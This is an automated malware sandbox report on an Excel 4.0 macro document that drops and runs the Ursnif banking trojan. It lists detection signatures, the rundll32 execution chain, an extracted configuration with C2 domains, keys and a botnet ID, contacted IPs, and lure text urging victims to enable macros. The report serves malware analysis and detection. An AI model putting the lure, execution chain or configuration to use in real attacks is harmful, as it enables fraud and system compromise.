Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report document-1245492889.xls

Overview

General Information

Sample Name:document-1245492889.xls
Analysis ID:383157
MD5:e30c71417d7675c13ca725d3bb4172eb
SHA1:80350061fb497c3fc79ac2cd4f8a315aceae412e
SHA256:05d2f75e43502476f32925c3f8ca82245c4f5433c4d405779e6fd178cd37ea13
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Machine Learning detection for dropped file
Office process drops PE file
Yara detected hidden Macro 4.0 in Excel
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2400 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2316 cmdline: rundll32 ..\fikftkm.thj,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2324 cmdline: rundll32 ..\fikftkm.thj1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2880 cmdline: rundll32 ..\fikftkm.thj2,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2920 cmdline: rundll32 ..\fikftkm.thj2,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
    • rundll32.exe (PID: 1788 cmdline: rundll32 ..\fikftkm.thj3,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 2988 cmdline: rundll32 ..\fikftkm.thj4,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

Threatname: Ursnif

[[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1245492889.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x1ed97:$e1: Enable Editing
  • 0x1edb6:$e2: Enable Content
document-1245492889.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x2aaa2:$s1: Excel
  • 0x2bb0b:$s1: Excel
  • 0x3b3c:$Auto_Open1: 18 00 17 00 AA 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1245492889.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
    document-1245492889.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        6.2.rundll32.exe.270000.1.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 6.2.rundll32.exe.270000.1.raw.unpackMalware Configuration Extractor: Ursnif [[{"RSA Public Key": "bUd4GFcFHo0e+ZYUbkHaTKXmZ1xEyxvy7Ha6j1WAZbQ7YvMdkqTfD1vHD2y2CmFTRrLK1w5iQroYI0mUpJ4xNknlY+BmJf4xpeJRxxK0RRNeRbW5unSB2vXqxvlTgz6vNZY+9zeztuP2jXKpIm0/s+YxWnsT7eWUtQtD38NlsAPtJdp+3rBxjzAWNKQj7wMA"}, {"c2_domain": ["bing.com", "update4.microsoft.com", "under17.com", "urs-world.com"], "botnet": "5566", "server": "12", "serpent_key": "10301029JSJUYDWG", "sleep_time": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}]]
          Multi AV Scanner detection for submitted fileShow sources
          Source: document-1245492889.xlsVirustotal: Detection: 54%Perma Link
          Source: document-1245492889.xlsMetadefender: Detection: 32%Perma Link
          Source: document-1245492889.xlsReversingLabs: Detection: 18%
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\fikftkm.thj2Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gifJoe Sandbox ML: detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: unknownHTTPS traffic detected: 207.174.213.126:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.241.62.4:443 -> 192.168.2.22:49168 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 192.185.129.4:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49171 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49173 version: TLS 1.2

          Software Vulnerabilities:

          barindex
          Document exploit detected (drops PE files)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: 0104[1].gif.0.drJump to dropped file
          Document exploit detected (UrlDownloadToFile)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
          Source: global trafficDNS query: name: vts.us.com
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 207.174.213.126:443
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 207.174.213.126:443
          Source: Joe Sandbox ViewIP Address: 207.174.213.126 207.174.213.126
          Source: Joe Sandbox ViewIP Address: 198.50.218.68 198.50.218.68
          Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
          Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: vts.us.com
          Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: rundll32.exe, 00000003.00000002.2115568867.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109524493.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278827735.0000000001C77000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2277292535.0000000001DB7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177880792.0000000001D97000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2171790992.0000000001CC7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
          Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
          Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
          Source: unknownHTTPS traffic detected: 207.174.213.126:443 -> 192.168.2.22:49165 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 162.241.62.4:443 -> 192.168.2.22:49168 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 192.185.129.4:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 5.100.155.169:443 -> 192.168.2.22:49171 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 198.50.218.68:443 -> 192.168.2.22:49173 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE

          E-Banking Fraud:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.rundll32.exe.270000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
          Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please elk 14 Ru
          Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, please ell 14 R
          Source: Screenshot number: 12Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
          Source: Screenshot number: 12Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
          Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
          Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
          Source: Screenshot number: 16Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
          Source: Screenshot number: 16Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
          Source: Screenshot number: 20Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
          Source: Screenshot number: 20Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
          Found Excel 4.0 Macro with suspicious formulasShow sources
          Source: document-1245492889.xlsInitial sample: CALL
          Source: document-1245492889.xlsInitial sample: EXEC
          Found abnormal large hidden Excel 4.0 Macro sheetShow sources
          Source: document-1245492889.xlsInitial sample: Sheet size: 4081
          Source: document-1245492889.xlsInitial sample: Sheet size: 12790
          Found obfuscated Excel 4.0 MacroShow sources
          Source: document-1245492889.xlsInitial sample: High usage of CHAR() function: 40
          Office process drops PE fileShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj2Jump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gifJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00123A14
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00121B1E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0012150C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125A25
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125378
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125262
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00122566
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00121967
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00122A69
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001292B2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001231B3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001288BA
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00123FAB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00122FAF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00121CD0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001227D4
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001243D8
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_001213C5
          Source: document-1245492889.xlsOLE indicator, VBA macros: true
          Source: document-1245492889.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
          Source: document-1245492889.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
          Source: rundll32.exe, 00000003.00000002.2115424423.0000000001BB0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2109348201.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2278669504.0000000001A90000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2275869797.0000000001BD0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2177701429.0000000001BB0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
          Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@13/17@5/5
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\EDCE0000Jump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC58F.tmpJump to behavior
          Source: document-1245492889.xlsOLE indicator, Workbook stream: true
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
          Source: document-1245492889.xlsVirustotal: Detection: 54%
          Source: document-1245492889.xlsMetadefender: Detection: 32%
          Source: document-1245492889.xlsReversingLabs: Detection: 18%
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj,DllRegisterServer
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj1,DllRegisterServer
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj3,DllRegisterServer
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\fikftkm.thj4,DllRegisterServer
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fikftkm.thj2,DllRegisterServer
          Source: C:\Windows\System32\rundll32.exeAutomated click: OK
          Source: C:\Windows\System32\rundll32.exeAutomated click: OK
          Source: C:\Windows\System32\rundll32.exeAutomated click: OK
          Source: C:\Windows\System32\rundll32.exeAutomated click: OK
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push 00000000h; mov dword ptr [esp], edi
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push 00000000h; mov dword ptr [esp], edx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push 00000000h; mov dword ptr [esp], ebp
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push 00000000h; mov dword ptr [esp], edx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-10h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push 00000000h; mov dword ptr [esp], edi
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push 00000000h; mov dword ptr [esp], edi
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push 00000000h; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push 00000000h; mov dword ptr [esp], edi
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push 00000000h; mov dword ptr [esp], edx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-10h]; mov dword ptr [esp], edx
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-08h]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], eax
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00125F16 push dword ptr [ebp-0Ch]; mov dword ptr [esp], edx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj2Jump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gifJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj2Jump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gifJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj2Jump to dropped file

          Boot Survival:

          barindex
          Drops PE files to the user root directoryShow sources
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\fikftkm.thj2Jump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000006.00000002.2275673660.0000000000270000.00000004.00000001.sdmp, type: MEMORY
